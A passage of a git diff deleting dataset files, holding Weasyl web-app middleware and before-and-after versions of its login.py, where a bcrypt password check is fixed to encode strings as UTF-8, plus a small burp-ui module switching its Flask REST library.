db_timer_tween(request): - started_at = time.perf_counter() - request.sql_times = [] - request.memcached_times = [] - resp = handler(request) - ended_at = time.perf_counter() - time_in_sql = sum(request.sql_times) - time_in_memcached = sum(request.memcached_times) - time_in_python = ended_at - started_at - time_in_sql - time_in_memcached - resp.headers['X-SQL-Time-Spent'] = '%0.1fms' % (time_in_sql * 1000,) - resp.headers['X-Memcached-Time-Spent'] = '%0.1fms' % (time_in_memcached * 1000,) - resp.headers['X-Python-Time-Spent'] = '%0.1fms' % (time_in_python * 1000,) - resp.headers['X-SQL-Queries'] = str(len(request.sql_times)) - resp.headers['X-Memcached-Queries'] = str(len(request.memcached_times)) - return resp - return db_timer_tween - - -def session_tween_factory(handler, registry): - """ - A tween that sets a weasyl_session on a request. - """ - def callback(request, response): - sess_obj = request.weasyl_session - - if isinstance(sess_obj, GuestSession): - if sess_obj.create: - response.set_cookie('WZL', sess_obj.sessionid, max_age=None, - secure=request.scheme == 'https', httponly=True) - elif sess_obj.save: - session = request.pg_connection - - if sess_obj.create: - session.add(sess_obj) - response.set_cookie('WZL', sess_obj.sessionid, max_age=60 * 60 * 24 * 365, - secure=request.scheme == 'https', httponly=True) - session.flush() - - # TODO(hyena): Investigate a pyramid session_factory implementation instead. 
- def session_tween(request): - sess_obj = None - cookie = request.cookies.get('WZL') - - if cookie is not None: - if is_guest_token(cookie): - sess_obj = GuestSession(cookie) - else: - sess_obj = request.pg_connection.query(orm.Session).get(cookie) - - if sess_obj is None: - sess_obj = create_guest_session() - - request.weasyl_session = sess_obj - - set_user( - {"id": sess_obj.userid} if sess_obj.userid - else {"ip_address": request.client_addr}) - - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) - return handler(request) - - return session_tween - - -def query_debug_tween_factory(handler, registry): - """ - A tween that allows developers to view timing per query. - """ - def callback(request, response): - if not hasattr(request, 'weasyl_session') or request.weasyl_session.userid not in staff.DEVELOPERS: - return - - class ParameterCounter(object): - def __init__(self): - self.next = 1 - self.ids = {} - - def __getitem__(self, name): - id = self.ids.get(name) - - if id is None: - id = self.ids[name] = self.next - self.next += 1 - - return u'$%i' % (id,) - - debug_rows = [] - - for statement, t in request.query_debug: - statement = u' '.join(statement.split()).replace(u'( ', u'(').replace(u' )', u')') % ParameterCounter() - debug_rows.append(u'<tr><td>%.1f ms</td><td>%s</td></tr>' % (t * 1000, html.escape(statement))) - - response.text += u''.join( - [u'<table>'] - + debug_rows - + [u'</table>
'] - ) - - def query_debug_tween(request): - if 'query_debug' in request.params: - request.query_debug = [] - request.add_response_callback(callback) - - return handler(request) - - return query_debug_tween - - -def status_check_tween_factory(handler, registry): - """ - A tween that checks if the weasyl user is banned, suspended, etc. and redirects appropriately. - - Rather than performing these checks on every view. - """ - def status_check_tween(request): - status = d.common_status_check(request.userid) - if status: - return Response(d.common_status_page(request.userid, status)) - return handler(request) - return status_check_tween - - -def database_session_cleanup_tween_factory(handler, registry): - """ - A tween that cleans up the thread-local database session after every request. - """ - def database_session_cleanup_tween(request): - def cleanup(request): - d.sessionmaker.remove() - - request.add_finished_callback(cleanup) - return handler(request) - - return database_session_cleanup_tween - - -def _generate_http2_server_push_headers(): - """ - Generates the Link headers to load HTTP/2 Server Push resources which are needed on each pageload. Written - as a separate function to only execute this code a single time, since we just need to generate this each - time the code is relaunched (e.g., each time the web workers are kicked to a new version of the code). - - A component of ``http2_server_push_tween_factory`` - :return: An ASCII encoded string to be loaded into the Link header set inside of ``http2_server_push_tween_factory`` - """ - css_preload = [ - '<' + item + '>; rel=preload; as=style' for item in [ - d.get_resource_path('css/site.css'), - d.get_resource_path('fonts/museo500.css'), - ] - ] - - js_preload = [ - '<' + item + '>; rel=preload; as=script' for item in [ - d.get_resource_path('js/jquery-2.2.4.min.js'), - d.get_resource_path('js/scripts.js'), - ] - ] - - return ", ".join(css_preload + js_preload) - - -# Part of the `Link` header that will be set in the `http2_server_push_tween_factory` function, below -HTTP2_LINK_HEADER_PRELOADS = _generate_http2_server_push_headers() - - -def http2_server_push_tween_factory(handler, registry): - """ - Add the 'Link' header to outgoing responses to HTTP/2 Server Push render-blocking resources - """ - def http2_server_push(request): - resp = handler(request) - - # Combined HTTP/2 headers indicating which resources to server push - resp.headers['Link'] = HTTP2_LINK_HEADER_PRELOADS - return resp - return http2_server_push - - -# Properties and methods to enhance the pyramid `request`. -def pg_connection_request_property(request): - """ - Used for the reified pg_connection property on weasyl requests. - """ - return d.sessionmaker() - - -def userid_request_property(request): - """ - Used for the userid property on weasyl requests. - """ - api_token = request.headers.get('X_WEASYL_API_KEY') - authorization = request.headers.get('AUTHORIZATION') - if api_token is not None: - # TODO: If reification of userid becomes an issue (e.g. because of userid changing after sign-in) revisit this. - # It's possible that we don't need to reify the entire property, but just cache the result of this query in a - # cache on arguments inner function. 
- userid = d.engine.scalar("SELECT userid FROM api_tokens WHERE token = %(token)s", token=api_token) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Weasyl-API-Key', 'realm="Weasyl"')) - return userid - - elif authorization: - from weasyl.oauth2 import get_userid_from_authorization - userid = get_userid_from_authorization(request) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Bearer', 'realm="Weasyl" error="invalid_token"')) - return userid - - else: - userid = request.weasyl_session.userid - return 0 if userid is None else userid - - -def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object - in the style of web.input(). - TODO: Replace usages of this method with accessing request directly. - - @param request: The pyramid request object. - @param kwargs: Default values. If a default value is a list, it indicates that multiple - values of that key should be collapsed into a list. - @return: A dictionary-like object in the fashion of web.py's web.input() - """ - return storify(request.params.mixed(), *required, **kwargs) - - -# Methods to add response callbacks to a request. The callbacks run in the order they -# were registered. Note that these will not run if an exception is thrown that isn't handled by -# our exception view. -def set_cookie_on_response(request, name=None, value='', max_age=None, path='/', domain=None, - secure=False, httponly=False, comment=None, overwrite=False): - """ - Registers a callback on the request to set a cookie in the response. - Parameters have the same meaning as ``pyramid.response.Response.set_cookie``. - """ - def callback(request, response): - response.set_cookie(name, value, max_age, path, domain, secure, httponly, comment, - overwrite) - request.add_response_callback(callback) - - -def delete_cookie_on_response(request, name, path='/', domain=None): - """ - Register a callback on the request to delete a cookie from the client. - Parameters have the same meaning as ``pyramid.response.Response.delete_cookie``. - """ - def callback(request, response): - response.delete_cookie(name, path, domain) - request.add_response_callback(callback) - - -def weasyl_exception_view(exc, request): - """ - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): - capture_message('HTTP client went away') - return request.response - else: - # Avoid using the reified request.userid property here. It might not be set and it might - # have changed due to signin/out. - if hasattr(request, 'weasyl_session'): - userid = request.weasyl_session.userid - else: - userid = 0 - request.userid = 0 # To keep templates happy. 
- errorpage_kwargs = {} - if isinstance(exc, WeasylError): - status_code = errorcode.error_status_code.get(exc.value, 422) - if exc.render_as_json: - return Response(json={'error': {'name': exc.value}}, - status_code=status_code) - errorpage_kwargs = exc.errorpage_kwargs - if exc.value in errorcode.error_messages: - message = errorcode.error_messages[exc.value] - if exc.error_suffix: - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) - request_id = secrets.token_urlsafe(6) - with push_scope() as scope: - scope.set_tag('request_id', request_id) - event_id = capture_exception(exc) - if event_id is not None: - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() - if getattr(exc, "__render_as_json", False): - return Response(json={'error': {}}, status_code=500) - else: - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - -def strip_session_cookie(event, hint): - if request := event.get('request'): - if (headers := request.get('headers')) and 'Cookie' in headers: - headers['Cookie'] = re.sub( - r'(WZL="?)([^";]+)', - lambda match: match.group(1) + '*' * len(match.group(2)), - headers['Cookie'] - ) - if (cookies := request.get('cookies')) and 'WZL' in cookies: - cookies['WZL'] = '*' * len(cookies['WZL']) - return event - - -class URLSchemeFixingMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - if environ.get('HTTP_X_FORWARDED_PROTO') == 'https': - environ['wsgi.url_scheme'] = 'https' - return self.app(environ, start_response) - - -def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) - try: - return meth(*a, **kw) - except ValueError: - raise ClientGoneAway() - return wrap - - -class InputWrap(object): - def __init__(self, wrapped): - self._wrapped = wrapped - - read = _wrapperfunc('read') - readline = _wrapperfunc('readline') - readlines = _wrapperfunc('readlines') - - def __iter__(self): - it = iter(self._wrapped) - while True: - try: - yield next(it) - except StopIteration: - return - except ValueError: - raise ClientGoneAway() - - -class InputWrapMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - environ['wsgi.input'] = InputWrap(environ['wsgi.input']) - return self.app(environ, start_response) - - -@event.listens_for(Engine, 'before_cursor_execute') -def before_cursor_execute(conn, cursor, statement, parameters, context, executemany): - context._query_start_time = time.perf_counter() - - -@event.listens_for(Engine, 'after_cursor_execute') -def after_cursor_execute(conn, cursor, statement, parameters, context, executemany): - total = time.perf_counter() - context._query_start_time - request = get_current_request() # TODO: There should be a better way to save this. 
- if hasattr(request, 'sql_times'): - request.sql_times.append(total) - if hasattr(request, 'query_debug'): - request.query_debug.append((statement, total)) diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff deleted file mode 100644 index 05e7a08..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff +++ /dev/null @@ -1,33 +0,0 @@ -diff --git a/weasyl/login.py b/weasyl/login.py - index 67a8735c7d9650c5e0075fa2993bd3919280fc6e..f6230c731f662be1301bdc38f6ab9815c7441144 100644 - --- a/weasyl/login.py - +++ b/weasyl/login.py -@@ -69,11 +69,12 @@ def authenticate_bcrypt(username, password, session=True): - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query -+ HASHSUM = HASHSUM.encode('utf-8') - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) -- if not unicode_success and not bcrypt.checkpw(d.plaintext(password), HASHSUM): -+ if not unicode_success and not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: -@@ -276,12 +277,12 @@ def update_unicode_password(userid, password, password_confirm): - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s -- """, userid=userid) -+ """, userid=userid).encode('utf-8') - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - -- if not bcrypt.checkpw(d.plaintext(password), hashpw): -+ if not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py deleted file mode 100644 index dce983d..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py +++ /dev/null @@ -1,304 +0,0 @@ -# login.py - -import arrow -import bcrypt -from sqlalchemy.sql.expression import select - -from libweasyl import security -from libweasyl import staff - -from weasyl import define as d -from weasyl import macro as m -from weasyl import emailer -from weasyl import moderation -from weasyl.error import WeasylError - - -_EMAIL = 100 -_PASSWORD = 10 -_USERNAME = 25 - - -def signin(userid): - # Update the last login record for the user - d.execute("UPDATE login SET last_login = %i WHERE userid = %i", [d.get_time(), userid]) - - # set the userid on the session - sess = d.web.ctx.weasyl_session - sess.userid = userid - sess.save = True - - -def signout(userid): - sess = d.web.ctx.weasyl_session - # unset SFW-mode cookie on logout - d.web.setcookie("sfwmode", "nsfw", -1) - if sess.additional_data.get('user-stack'): - sess.userid = sess.additional_data['user-stack'].pop() - sess.additional_data.changed() - else: - sess.userid = None - sess.save = True - - -def authenticate_bcrypt(username, password, session=True): - """ - Return a result tuple of the form (userid, error); `error` is None if the - login was successful. Pass `session` as False to authenticate a user without - creating a new session. 
- - Possible errors are: - - "invalid" - - "unexpected" - - "address" - - "banned" - - "suspended" - """ - # Check that the user entered potentially valid values for `username` and - # `password` before attempting to authenticate them - if not username or not password: - return 0, "invalid" - - # Select the authentication data necessary to check that the the user-entered - # credentials are valid - query = d.execute("SELECT ab.userid, ab.hashsum, lo.settings FROM authbcrypt ab" - " RIGHT JOIN login lo USING (userid)" - " WHERE lo.login_name = '%s'", [d.get_sysname(username)], ["single"]) - - if not query: - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) - if not unicode_success and not bcrypt.checkpw(d.plaintext(password), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: - d.append_to_log('login.fail', userid=USERID, ip=d.get_address()) - d.metric('increment', 'failedlogins') - - # Return a zero userid and an error code (indicating the entered password - # was incorrect) - return 0, "invalid" - elif "b" in SETTINGS: - # Return the proper userid and an error code (indicating the user's account - # has been banned) - return USERID, "banned" - elif "s" in SETTINGS: - suspension = moderation.get_suspension(USERID) - - if d.get_time() > suspension.release: - d.execute("UPDATE login SET settings = REPLACE(settings, 's', '') WHERE userid = %i", [USERID]) - d.execute("DELETE FROM suspension WHERE userid = %i", [USERID]) - d.get_login_settings.invalidate(USERID) - else: - # Return the proper userid and an error code (indicating the user's - # account has been temporarily suspended) - return USERID, "suspended" - - # Attempt to create a new session if `session` is True, then log the signin - # if it succeeded. - if session: - signin(USERID) - d.append_to_log('login.success', userid=USERID, ip=d.get_address()) - d.metric('increment', 'logins') - - status = None - if not unicode_success: - # Oops; the user's password was stored badly, but they did successfully authenticate. - status = 'unicode-failure' - # Either way, authentication succeeded, so return the userid and a status. - return USERID, status - - -def passhash(password): - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(m.MACRO_BCRYPT_ROUNDS)) - - -def password_secure(password): - """ - Return True if the password meets requirements, else False. 
- """ - return len(password) >= _PASSWORD - - -# form -# username email month -# password emailcheck year -# passcheck day - -def create(form): - # Normalize form data - username = d.plaintext(form.username[:_USERNAME]) - sysname = d.get_sysname(username) - - email = emailer.normalize_address(form.email) - emailcheck = emailer.normalize_address(form.emailcheck) - - password = form.password - passcheck = form.passcheck - - if form.day and form.month and form.year: - try: - birthday = arrow.Arrow(int(form.year), int(form.month), int(form.day)) - except ValueError: - raise WeasylError("birthdayInvalid") - else: - birthday = None - - # Check mismatched form data - if password != passcheck: - raise WeasylError("passwordMismatch") - if email != emailcheck: - raise WeasylError("emailMismatch") - - # Check invalid form data - if birthday is None or d.age_in_years(birthday) < 13: - raise WeasylError("birthdayInvalid") - if not password_secure(password): - raise WeasylError("passwordInsecure") - if not email: - raise WeasylError("emailInvalid") - if not sysname or ";" in username: - raise WeasylError("usernameInvalid") - if sysname in ["admin", "administrator", "mod", "moderator", "weasyl", - "weasyladmin", "weasylmod", "staff", "security"]: - raise WeasylError("usernameInvalid") - if email_exists(email): - raise WeasylError("emailExists") - if username_exists(sysname): - raise WeasylError("usernameExists") - - # Create pending account - token = security.generate_key(40) - - d.engine.execute(d.meta.tables["logincreate"].insert(), { - "token": token, - "username": username, - "login_name": sysname, - "hashpass": passhash(password), - "email": email, - "birthday": birthday, - "unixtime": arrow.now(), - }) - - # Queue verification email - emailer.append([email], None, "Weasyl Account Creation", d.render( - "email/verify_account.html", [token, sysname])) - d.metric('increment', 'createdusers') - - -def verify(token): - lo = d.meta.tables["login"] - lc = d.meta.tables["logincreate"] - query = d.engine.execute(lc.select().where(lc.c.token == token)).first() - - if not query: - raise WeasylError("logincreateRecordMissing") - - db = d.connect() - with db.begin(): - # Create login record - userid = db.execute(lo.insert().returning(lo.c.userid), { - "login_name": d.get_sysname(query.username), - "last_login": arrow.now(), - "email": query.email, - }).scalar() - - # Create profile records - db.execute(d.meta.tables["authbcrypt"].insert(), { - "userid": userid, - "hashsum": query.hashpass, - }) - db.execute(d.meta.tables["profile"].insert(), { - "userid": userid, - "username": query.username, - "full_name": query.username, - "unixtime": arrow.now(), - "config": "kscftj", - }) - db.execute(d.meta.tables["userinfo"].insert(), { - "userid": userid, - "birthday": query.birthday, - }) - db.execute(d.meta.tables["userstats"].insert(), { - "userid": userid, - }) - db.execute(d.meta.tables["welcomecount"].insert(), { - "userid": userid, - }) - - # Update logincreate records - db.execute(lc.delete().where(lc.c.token == token)) - - d.metric('increment', 'verifiedusers') - - -def email_exists(email): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE email = %(email)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE email = %(email)s) - """, email=email).scalar() - - -def username_exists(login_name): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE login_name = %(name)s) OR - EXISTS (SELECT 0 FROM useralias WHERE alias_name = %(name)s) OR - EXISTS (SELECT 0 FROM logincreate 
WHERE login_name = %(name)s) - """, name=login_name).scalar() - - -def settings(userid, setting=None): - if setting: - return d.execute("SELECT settings ~ '%s' FROM login WHERE userid = %i", - [setting, userid], options="bool") - else: - return d.execute("SELECT settings FROM login WHERE userid = %i", - [userid], options="element") - - -def sessionid(userid): - return d.execute("SELECT sessionid FROM usersession WHERE userid = %i", - [userid], options="element") - - -def update_unicode_password(userid, password, password_confirm): - if password != password_confirm: - raise WeasylError('passwordMismatch') - if not password_secure(password): - raise WeasylError('passwordInsecure') - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s - """, userid=userid) - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - - if not bcrypt.checkpw(d.plaintext(password), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" - UPDATE authbcrypt SET hashsum = %(hashsum)s WHERE userid = %(userid)s - """, userid=userid, hashsum=passhash(password)) - - -def get_account_verification_token(email=None, username=None): - email = email and emailer.normalize_address(email) - username = username and d.get_sysname(username) - - logincreate = d.meta.tables['logincreate'] - statement = select([logincreate.c.token]) - - if email: - statement = statement.where(logincreate.c.email.ilike(email)) - else: - statement = statement.where(logincreate.c.login_name == username) - - return d.engine.execute(statement).scalar() diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py deleted file mode 100644 index 41ed84e..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py +++ /dev/null @@ -1,305 +0,0 @@ -# login.py - -import arrow -import bcrypt -from sqlalchemy.sql.expression import select - -from libweasyl import security -from libweasyl import staff - -from weasyl import define as d -from weasyl import macro as m -from weasyl import emailer -from weasyl import moderation -from weasyl.error import WeasylError - - -_EMAIL = 100 -_PASSWORD = 10 -_USERNAME = 25 - - -def signin(userid): - # Update the last login record for the user - d.execute("UPDATE login SET last_login = %i WHERE userid = %i", [d.get_time(), userid]) - - # set the userid on the session - sess = d.web.ctx.weasyl_session - sess.userid = userid - sess.save = True - - -def signout(userid): - sess = d.web.ctx.weasyl_session - # unset SFW-mode cookie on logout - d.web.setcookie("sfwmode", "nsfw", -1) - if sess.additional_data.get('user-stack'): - sess.userid = sess.additional_data['user-stack'].pop() - sess.additional_data.changed() - else: - sess.userid = None - sess.save = True - - -def authenticate_bcrypt(username, password, session=True): - """ - Return a result tuple of the form (userid, error); `error` is None if the - login was successful. Pass `session` as False to authenticate a user without - creating a new session. 
- - Possible errors are: - - "invalid" - - "unexpected" - - "address" - - "banned" - - "suspended" - """ - # Check that the user entered potentially valid values for `username` and - # `password` before attempting to authenticate them - if not username or not password: - return 0, "invalid" - - # Select the authentication data necessary to check that the user-entered - # credentials are valid - query = d.execute("SELECT ab.userid, ab.hashsum, lo.settings FROM authbcrypt ab" - " RIGHT JOIN login lo USING (userid)" - " WHERE lo.login_name = '%s'", [d.get_sysname(username)], ["single"]) - - if not query: - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query - HASHSUM = HASHSUM.encode('utf-8') - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) - if not unicode_success and not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: - d.append_to_log('login.fail', userid=USERID, ip=d.get_address()) - d.metric('increment', 'failedlogins') - - # Return a zero userid and an error code (indicating the entered password - # was incorrect) - return 0, "invalid" - elif "b" in SETTINGS: - # Return the proper userid and an error code (indicating the user's account - # has been banned) - return USERID, "banned" - elif "s" in SETTINGS: - suspension = moderation.get_suspension(USERID) - - if d.get_time() > suspension.release: - d.execute("UPDATE login SET settings = REPLACE(settings, 's', '') WHERE userid = %i", [USERID]) - d.execute("DELETE FROM suspension WHERE userid = %i", [USERID]) - d.get_login_settings.invalidate(USERID) - else: - # Return the proper userid and an error code (indicating the user's - # account has been temporarily suspended) - return USERID, "suspended" - - # Attempt to create a new session if `session` is True, then log the signin - # if it succeeded. - if session: - signin(USERID) - d.append_to_log('login.success', userid=USERID, ip=d.get_address()) - d.metric('increment', 'logins') - - status = None - if not unicode_success: - # Oops; the user's password was stored badly, but they did successfully authenticate. - status = 'unicode-failure' - # Either way, authentication succeeded, so return the userid and a status. - return USERID, status - - -def passhash(password): - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(m.MACRO_BCRYPT_ROUNDS)) - - -def password_secure(password): - """ - Return True if the password meets requirements, else False. 
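# [Editorial sketch, not part of the original patch.] The target file above differs from the source mainly in encoding values before calling bcrypt: the `bcrypt` package's `checkpw(password, hashed_password)` compares raw bytes, so both arguments must be bytes. A minimal illustration of the same pattern, assuming the stored hash comes back from the database as `str` (the helper name `verify_password` is hypothetical):
#
#     import bcrypt
#
#     def verify_password(password: str, stored_hash: str) -> bool:
#         # Both sides must be bytes; passing str raises a TypeError in bcrypt 1.x
#         return bcrypt.checkpw(password.encode('utf-8'),
#                               stored_hash.encode('utf-8'))
#
#     hashed = bcrypt.hashpw(b'hunter2', bcrypt.gensalt()).decode('utf-8')
#     assert verify_password('hunter2', hashed)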
- """ - return len(password) >= _PASSWORD - - -# form -# username email month -# password emailcheck year -# passcheck day - -def create(form): - # Normalize form data - username = d.plaintext(form.username[:_USERNAME]) - sysname = d.get_sysname(username) - - email = emailer.normalize_address(form.email) - emailcheck = emailer.normalize_address(form.emailcheck) - - password = form.password - passcheck = form.passcheck - - if form.day and form.month and form.year: - try: - birthday = arrow.Arrow(int(form.year), int(form.month), int(form.day)) - except ValueError: - raise WeasylError("birthdayInvalid") - else: - birthday = None - - # Check mismatched form data - if password != passcheck: - raise WeasylError("passwordMismatch") - if email != emailcheck: - raise WeasylError("emailMismatch") - - # Check invalid form data - if birthday is None or d.age_in_years(birthday) < 13: - raise WeasylError("birthdayInvalid") - if not password_secure(password): - raise WeasylError("passwordInsecure") - if not email: - raise WeasylError("emailInvalid") - if not sysname or ";" in username: - raise WeasylError("usernameInvalid") - if sysname in ["admin", "administrator", "mod", "moderator", "weasyl", - "weasyladmin", "weasylmod", "staff", "security"]: - raise WeasylError("usernameInvalid") - if email_exists(email): - raise WeasylError("emailExists") - if username_exists(sysname): - raise WeasylError("usernameExists") - - # Create pending account - token = security.generate_key(40) - - d.engine.execute(d.meta.tables["logincreate"].insert(), { - "token": token, - "username": username, - "login_name": sysname, - "hashpass": passhash(password), - "email": email, - "birthday": birthday, - "unixtime": arrow.now(), - }) - - # Queue verification email - emailer.append([email], None, "Weasyl Account Creation", d.render( - "email/verify_account.html", [token, sysname])) - d.metric('increment', 'createdusers') - - -def verify(token): - lo = d.meta.tables["login"] - lc = d.meta.tables["logincreate"] - query = d.engine.execute(lc.select().where(lc.c.token == token)).first() - - if not query: - raise WeasylError("logincreateRecordMissing") - - db = d.connect() - with db.begin(): - # Create login record - userid = db.execute(lo.insert().returning(lo.c.userid), { - "login_name": d.get_sysname(query.username), - "last_login": arrow.now(), - "email": query.email, - }).scalar() - - # Create profile records - db.execute(d.meta.tables["authbcrypt"].insert(), { - "userid": userid, - "hashsum": query.hashpass, - }) - db.execute(d.meta.tables["profile"].insert(), { - "userid": userid, - "username": query.username, - "full_name": query.username, - "unixtime": arrow.now(), - "config": "kscftj", - }) - db.execute(d.meta.tables["userinfo"].insert(), { - "userid": userid, - "birthday": query.birthday, - }) - db.execute(d.meta.tables["userstats"].insert(), { - "userid": userid, - }) - db.execute(d.meta.tables["welcomecount"].insert(), { - "userid": userid, - }) - - # Update logincreate records - db.execute(lc.delete().where(lc.c.token == token)) - - d.metric('increment', 'verifiedusers') - - -def email_exists(email): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE email = %(email)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE email = %(email)s) - """, email=email).scalar() - - -def username_exists(login_name): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE login_name = %(name)s) OR - EXISTS (SELECT 0 FROM useralias WHERE alias_name = %(name)s) OR - EXISTS (SELECT 0 FROM logincreate 
WHERE login_name = %(name)s) - """, name=login_name).scalar() - - -def settings(userid, setting=None): - if setting: - return d.execute("SELECT settings ~ '%s' FROM login WHERE userid = %i", - [setting, userid], options="bool") - else: - return d.execute("SELECT settings FROM login WHERE userid = %i", - [userid], options="element") - - -def sessionid(userid): - return d.execute("SELECT sessionid FROM usersession WHERE userid = %i", - [userid], options="element") - - -def update_unicode_password(userid, password, password_confirm): - if password != password_confirm: - raise WeasylError('passwordMismatch') - if not password_secure(password): - raise WeasylError('passwordInsecure') - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s - """, userid=userid).encode('utf-8') - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - - if not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" - UPDATE authbcrypt SET hashsum = %(hashsum)s WHERE userid = %(userid)s - """, userid=userid, hashsum=passhash(password)) - - -def get_account_verification_token(email=None, username=None): - email = email and emailer.normalize_address(email) - username = username and d.get_sysname(username) - - logincreate = d.meta.tables['logincreate'] - statement = select([logincreate.c.token]) - - if email: - statement = statement.where(logincreate.c.email.ilike(email)) - else: - statement = statement.where(logincreate.c.login_name == username) - - return d.engine.execute(statement).scalar() diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff deleted file mode 100644 index 0b55fd3..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/__init__.py b/burpui/api/__init__.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/__init__.py - +++ b/burpui/api/__init__.py -@@ -11,7 +11,7 @@ - import os - import sys - --from flask.ext.restful import Api -+from flask.ext.restplus import Api - from importlib import import_module - - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py deleted file mode 100644 index f4a37e6..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py +++ /dev/null @@ -1,43 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api - :platform: Unix - :synopsis: Burp-UI api module. - -.. moduleauthor:: Ziirish - - -""" -import os -import sys - -from flask.ext.restful import Api -from importlib import import_module - - -class ApiWrapper(Api): - loaded = False - - def init_bui(self, bui): - """Loads the right context. - :param bui: application context - :type bui: :class:`burpui.server.BUIServer` - """ - self.bui = bui - - def load_all(self): - # hack to automatically import api modules - if not self.loaded: - sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) - self.loaded = True - for f in os.listdir(__path__[0]): - name, ext = os.path.splitext(f) - if (os.path.isfile(os.path.join(__path__[0], f)) and - ext == '.py' and - name not in ['__init__', '.', '..']): - mod = '.' 
+ name - import_module(mod, 'burpui.api') - - -api = ApiWrapper() -api.load_all() diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py deleted file mode 100644 index 72d5bce..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py +++ /dev/null @@ -1,43 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api - :platform: Unix - :synopsis: Burp-UI api module. - -.. moduleauthor:: Ziirish - - -""" -import os -import sys - -from flask.ext.restplus import Api -from importlib import import_module - - -class ApiWrapper(Api): - loaded = False - - def init_bui(self, bui): - """Loads the right context. - :param bui: application context - :type bui: :class:`burpui.server.BUIServer` - """ - self.bui = bui - - def load_all(self): - # hack to automatically import api modules - if not self.loaded: - sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) - self.loaded = True - for f in os.listdir(__path__[0]): - name, ext = os.path.splitext(f) - if (os.path.isfile(os.path.join(__path__[0], f)) and - ext == '.py' and - name not in ['__init__', '.', '..']): - mod = '.' + name - import_module(mod, 'burpui.api') - - -api = ApiWrapper() -api.load_all() diff --git 